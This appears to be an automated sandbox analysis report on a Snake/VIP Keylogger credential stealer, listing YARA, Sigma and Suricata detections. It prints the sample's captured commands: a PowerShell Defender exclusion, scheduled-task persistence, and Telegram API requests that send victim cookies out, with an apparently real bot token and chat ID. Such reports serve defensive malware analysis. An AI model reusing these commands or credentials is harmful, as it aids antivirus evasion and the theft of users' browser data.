10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c081:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fca1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b724:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f344:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b981:$a4: \Orbitum\User Data\Default\Login Data 0x7f5a1:$a4: \Orbitum\User Data\Default\Login Data 0x3c360:$a5: \Kometa\User Data\Default\Login Data 0x7ff80:$a5: \Kometa\User Data\Default\Login Data
10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef68:$s1: UnHook 0x72b88:$s1: UnHook 0x2ef6f:$s2: SetHook 0x72b8f:$s2: SetHook 0x2ef77:$s3: CallNextHook 0x72b97:$s3: CallNextHook 0x2ef84:$s4: _hook 0x72ba4:$s4: _hook
Click to see the 43 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OtldpQxzAw.exe", ParentImage: C:\Users\user\Desktop\OtldpQxzAw.exe, ParentProcessId: 6416, ParentProcessName: OtldpQxzAw.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", ProcessId: 6896, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe, ParentImage: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe, ParentProcessId: 2664, ParentProcessName: wiSeRRwvZHTk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp", ProcessId: 6544, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\OtldpQxzAw.exe", ParentImage: C:\Users\user\Desktop\OtldpQxzAw.exe, ParentProcessId: 6416, ParentProcessName: OtldpQxzAw.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp", ProcessId: 7064, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OtldpQxzAw.exe", ParentImage: C:\Users\user\Desktop\OtldpQxzAw.exe, ParentProcessId: 6416, ParentProcessName: OtldpQxzAw.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe", ProcessId: 6896, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6940, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\OtldpQxzAw.exe", ParentImage: C:\Users\user\Desktop\OtldpQxzAw.exe, ParentProcessId: 6416, ParentProcessName: OtldpQxzAw.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp", ProcessId: 7064, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:00:06.253553+0100	2803305	3	Unknown Traffic	192.168.2.8	49684	104.21.32.1	443	TCP
2025-03-07T23:00:25.577084+0100	2803305	3	Unknown Traffic	192.168.2.8	49691	104.21.32.1	443	TCP
2025-03-07T23:00:31.575861+0100	2803305	3	Unknown Traffic	192.168.2.8	49697	104.21.32.1	443	TCP
2025-03-07T23:00:37.129249+0100	2803305	3	Unknown Traffic	192.168.2.8	49708	104.21.32.1	443	TCP
2025-03-07T23:00:40.086985+0100	2803305	3	Unknown Traffic	192.168.2.8	49716	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:59:59.615864+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49682	193.122.130.0	80	TCP
2025-03-07T23:00:04.165421+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49682	193.122.130.0	80	TCP
2025-03-07T23:00:15.522001+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49685	193.122.130.0	80	TCP
2025-03-07T23:00:17.553216+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49686	193.122.130.0	80	TCP
2025-03-07T23:00:20.990736+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49685	193.122.130.0	80	TCP
2025-03-07T23:00:23.443829+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49685	193.122.130.0	80	TCP
2025-03-07T23:00:26.115692+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49693	193.122.130.0	80	TCP
2025-03-07T23:00:28.897142+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49695	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:00:49.700570+0100	1810008	1	Potentially Bad Traffic	192.168.2.8	49722	149.154.167.220	443	TCP
2025-03-07T23:00:52.544691+0100	1810008	1	Potentially Bad Traffic	192.168.2.8	49723	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T23:00:42.481770+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	49718	149.154.167.220	443	TCP
2025-03-07T23:00:45.371013+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	49721	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: OtldpQxzAw.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe

Avira: detection malicious, Label: TR/AD.SnakeStealer.gmupi

Found malware configuration

Source: 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0", "Chat id": "5022382431"}
Source: 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0", "Chat_id": "5022382431", "Version": "4.4"}
Source: OtldpQxzAw.exe.808.9.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Virustotal: Detection: 76%			Perma Link

Multi AV Scanner detection for submitted file

Source: OtldpQxzAw.exe	Virustotal: Detection: 76%			Perma Link
Source: OtldpQxzAw.exe	ReversingLabs: Detection: 73%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack	String decryptor: 7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack	String decryptor: 5022382431
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack	String decryptor:
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack	String decryptor: 7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack	String decryptor: 5022382431
Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: OtldpQxzAw.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49683 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49687 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49690 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49721 version: TLS 1.2

Source: OtldpQxzAw.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RufU.pdbSHA256 source: OtldpQxzAw.exe, wiSeRRwvZHTk.exe.0.dr
Source:	Binary string: RufU.pdb source: OtldpQxzAw.exe, wiSeRRwvZHTk.exe.0.dr

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 010BF2EDh	9_2_010BF150
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 010BF2EDh	9_2_010BF33C
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 010BFAA9h	9_2_010BF804
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 06882D49h	9_2_06882A98
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 06883310h	9_2_06882EF8
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 0688F139h	9_2_0688EE90
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 0688F591h	9_2_0688F2E8
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 06883310h	9_2_06882EF3
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 0688ECE1h	9_2_0688EA38
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 06883310h	9_2_0688323E
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06880673
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 0688FE41h	9_2_0688FB98
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 06880D0Dh	9_2_06880B30
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 068816F8h	9_2_06880B30
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 0688F9E9h	9_2_0688F740
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 0688D729h	9_2_0688D480
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 0688DB81h	9_2_0688D8D8
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 0688D2D1h	9_2_0688D028
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06880040
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06880853
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 0688E431h	9_2_0688E188
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 0688E889h	9_2_0688E5E0
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 4x nop then jmp 0688DFD9h	9_2_0688DD30
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 07CABD4Dh	10_2_07CAB785
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 030BF2EDh	14_2_030BF33C
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 030BF2EDh	14_2_030BF150
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 030BFAA9h	14_2_030BF7F1
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DA3310h	14_2_06DA2EF8
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DA2D49h	14_2_06DA2A98
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DA3310h	14_2_06DA2EEE
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DAF139h	14_2_06DAEE90
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_06DA0673
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DAF9E9h	14_2_06DAF740
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DAD729h	14_2_06DAD480
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DAE889h	14_2_06DAE5E0
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DADFD9h	14_2_06DADD30
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DAF591h	14_2_06DAF2E8
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DAECE1h	14_2_06DAEA38
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DA3310h	14_2_06DA323E
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DAFE41h	14_2_06DAFB98
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DA0D0Dh	14_2_06DA0B30
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DA16F8h	14_2_06DA0B30
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DADB81h	14_2_06DAD8D8
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_06DA0853
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_06DA0040
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DAD2D1h	14_2_06DAD028
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 4x nop then jmp 06DAE431h	14_2_06DAE188

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49721 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49718 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49722 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49723 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2009/03/2025%20/%2014:24:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:19:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0/sendDocument?chat_id=5022382431&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5f9638252d94Host: api.telegram.orgContent-Length: 734
Source: global traffic	HTTP traffic detected: POST /bot7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0/sendDocument?chat_id=5022382431&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5eeb09cb0cc4Host: api.telegram.orgContent-Length: 740

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49695 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49686 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49682 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49685 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49693 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49691 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49697 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49684 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
